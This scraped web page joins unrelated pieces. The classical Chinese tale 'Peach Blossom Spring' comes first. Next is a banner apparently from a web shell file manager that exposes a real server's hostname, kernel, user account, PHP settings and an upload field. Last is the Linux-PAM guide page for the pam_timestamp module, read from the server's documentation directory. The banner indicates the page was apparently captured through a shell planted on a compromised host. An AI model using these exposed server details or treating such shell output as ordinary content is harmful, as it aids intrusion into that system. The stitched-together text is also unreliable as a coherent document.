晋太元中,武陵人捕鱼为业。缘溪行,忘路之远近。忽逢桃花林,夹岸数百步,中无杂树,芳草鲜美,落英缤纷。渔人甚异之,复前行,欲穷其林。 林尽水源,便得一山,山有小口,仿佛若有光。便舍船,从口入。初极狭,才通人。复行数十步,豁然开朗。土地平旷,屋舍俨然,有良田、美池、桑竹之属。阡陌交通,鸡犬相闻。其中往来种作,男女衣着,悉如外人。黄发垂髫,并怡然自乐。 见渔人,乃大惊,问所从来。具答之。便要还家,设酒杀鸡作食。村中闻有此人,咸来问讯。自云先世避秦时乱,率妻子邑人来此绝境,不复出焉,遂与外人间隔。问今是何世,乃不知有汉,无论魏晋。此人一一为具言所闻,皆叹惋。余人各复延至其家,皆出酒食。停数日,辞去。此中人语云:“不足为外人道也。”(间隔 一作:隔绝) 既出,得其船,便扶向路,处处志之。及郡下,诣太守,说如此。太守即遣人随其往,寻向所志,遂迷,不复得路。 南阳刘子骥,高尚士也,闻之,欣然规往。未果,寻病终。后遂无问津者。
|
Server : Apache System : Linux srv.rainic.com 4.18.0-553.47.1.el8_10.x86_64 #1 SMP Wed Apr 2 05:45:37 EDT 2025 x86_64 User : rainic ( 1014) PHP Version : 7.4.33 Disable Function : exec,passthru,shell_exec,system Directory : /usr/share/doc/pam/html/ |
Upload File : |
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>6.35. pam_timestamp - authenticate using cached successful authentication attempts</title><meta name="generator" content="DocBook XSL Stylesheets Vsnapshot"><link rel="home" href="Linux-PAM_SAG.html" title="The Linux-PAM System Administrators' Guide"><link rel="up" href="sag-module-reference.html" title="Chapter 6. A reference guide for available modules"><link rel="prev" href="sag-pam_time.html" title="6.34. pam_time - time controled access"><link rel="next" href="sag-pam_umask.html" title="6.36. pam_umask - set the file mode creation mask"></head><body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF"><div class="navheader"><table width="100%" summary="Navigation header"><tr><th colspan="3" align="center">6.35. pam_timestamp - authenticate using cached successful authentication attempts</th></tr><tr><td width="20%" align="left"><a accesskey="p" href="sag-pam_time.html">Prev</a> </td><th width="60%" align="center">Chapter 6. A reference guide for available modules</th><td width="20%" align="right"> <a accesskey="n" href="sag-pam_umask.html">Next</a></td></tr></table><hr></div><div class="section"><div class="titlepage"><div><div><h2 class="title" style="clear: both"><a name="sag-pam_timestamp"></a>6.35. pam_timestamp - authenticate using cached successful authentication attempts</h2></div></div></div><div class="cmdsynopsis"><p><code class="command">pam_timestamp.so</code> [
timestampdir=<em class="replaceable"><code>directory</code></em>
] [
timestamp_timeout=<em class="replaceable"><code>number</code></em>
] [
verbose
] [
debug
]</p></div><div class="section"><div class="titlepage"><div><div><h3 class="title"><a name="sag-pam_timestamp-description"></a>6.35.1. DESCRIPTION</h3></div></div></div><p>
In a nutshell, <span class="emphasis"><em>pam_timestamp</em></span> caches successful
authentication attempts, and allows you to use a recent successful attempt as
the basis for authentication. This is similar mechanism which is used in
<span class="command"><strong>sudo</strong></span>.
</p><p>
When an application opens a session using <span class="emphasis"><em>pam_timestamp</em></span>,
a timestamp file is created in the <span class="emphasis"><em>timestampdir</em></span> directory
for the user. When an application attempts to authenticate the user, a
<span class="emphasis"><em>pam_timestamp</em></span> will treat a sufficiently recent timestamp
file as grounds for succeeding.
</p></div><div class="section"><div class="titlepage"><div><div><h3 class="title"><a name="sag-pam_timestamp-options"></a>6.35.2. OPTIONS</h3></div></div></div><div class="variablelist"><dl class="variablelist"><dt><span class="term">
<code class="option">timestampdir=<em class="replaceable"><code>directory</code></em></code>
</span></dt><dd><p>
Specify an alternate directory where
<span class="emphasis"><em>pam_timestamp</em></span> creates timestamp files.
</p></dd><dt><span class="term">
<code class="option">timestamp_timeout=<em class="replaceable"><code>number</code></em></code>
</span></dt><dd><p>
How long should <span class="emphasis"><em>pam_timestamp</em></span>
treat timestamp as valid after their
last modification date (in seconds). Default is 300 seconds.
</p></dd><dt><span class="term">
<code class="option">verbose</code>
</span></dt><dd><p>
Attempt to inform the user when access is granted.
</p></dd><dt><span class="term">
<code class="option">debug</code>
</span></dt><dd><p>
Turns on debugging messages sent to <span class="citerefentry"><span class="refentrytitle">syslog</span>(3)</span>.
</p></dd></dl></div></div><div class="section"><div class="titlepage"><div><div><h3 class="title"><a name="sag-pam_timestamp-types"></a>6.35.3. MODULE TYPES PROVIDED</h3></div></div></div><p>
The <code class="option">auth</code> and <code class="option">session</code>
module types are provided.
</p></div><div class="section"><div class="titlepage"><div><div><h3 class="title"><a name="sag-pam_timestamp-return_values"></a>6.35.4. RETURN VALUES</h3></div></div></div><div class="variablelist"><dl class="variablelist"><dt><span class="term">PAM_AUTH_ERR</span></dt><dd><p>
The module was not able to retrieve the user name or
no valid timestamp file was found.
</p></dd><dt><span class="term">PAM_SUCCESS</span></dt><dd><p>
Everything was successful.
</p></dd><dt><span class="term">PAM_SESSION_ERR</span></dt><dd><p>
Timestamp file could not be created or updated.
</p></dd></dl></div></div><div class="section"><div class="titlepage"><div><div><h3 class="title"><a name="sag-pam_timestamp-notes"></a>6.35.5. NOTES</h3></div></div></div><p>
Users can get confused when they are not always asked for passwords when
running a given program. Some users reflexively begin typing information before
noticing that it is not being asked for.
</p></div><div class="section"><div class="titlepage"><div><div><h3 class="title"><a name="sag-pam_timestamp-examples"></a>6.35.6. EXAMPLES</h3></div></div></div><pre class="programlisting">
auth sufficient pam_timestamp.so verbose
auth required pam_unix.so
session required pam_unix.so
session optional pam_timestamp.so
</pre></div><div class="section"><div class="titlepage"><div><div><h3 class="title"><a name="sag-pam_timestamp-files"></a>6.35.7. FILES</h3></div></div></div><div class="variablelist"><dl class="variablelist"><dt><span class="term"><code class="filename">/var/run/pam_timestamp/...</code></span></dt><dd><p>timestamp files and directories</p></dd></dl></div></div><div class="section"><div class="titlepage"><div><div><h3 class="title"><a name="sag-pam_timestamp-author"></a>6.35.8. AUTHOR</h3></div></div></div><p>
pam_timestamp was written by Nalin Dahyabhai.
</p></div></div><div class="navfooter"><hr><table width="100%" summary="Navigation footer"><tr><td width="40%" align="left"><a accesskey="p" href="sag-pam_time.html">Prev</a> </td><td width="20%" align="center"><a accesskey="u" href="sag-module-reference.html">Up</a></td><td width="40%" align="right"> <a accesskey="n" href="sag-pam_umask.html">Next</a></td></tr><tr><td width="40%" align="left" valign="top">6.34. pam_time - time controled access </td><td width="20%" align="center"><a accesskey="h" href="Linux-PAM_SAG.html">Home</a></td><td width="40%" align="right" valign="top"> 6.36. pam_umask - set the file mode creation mask</td></tr></table></div></body></html>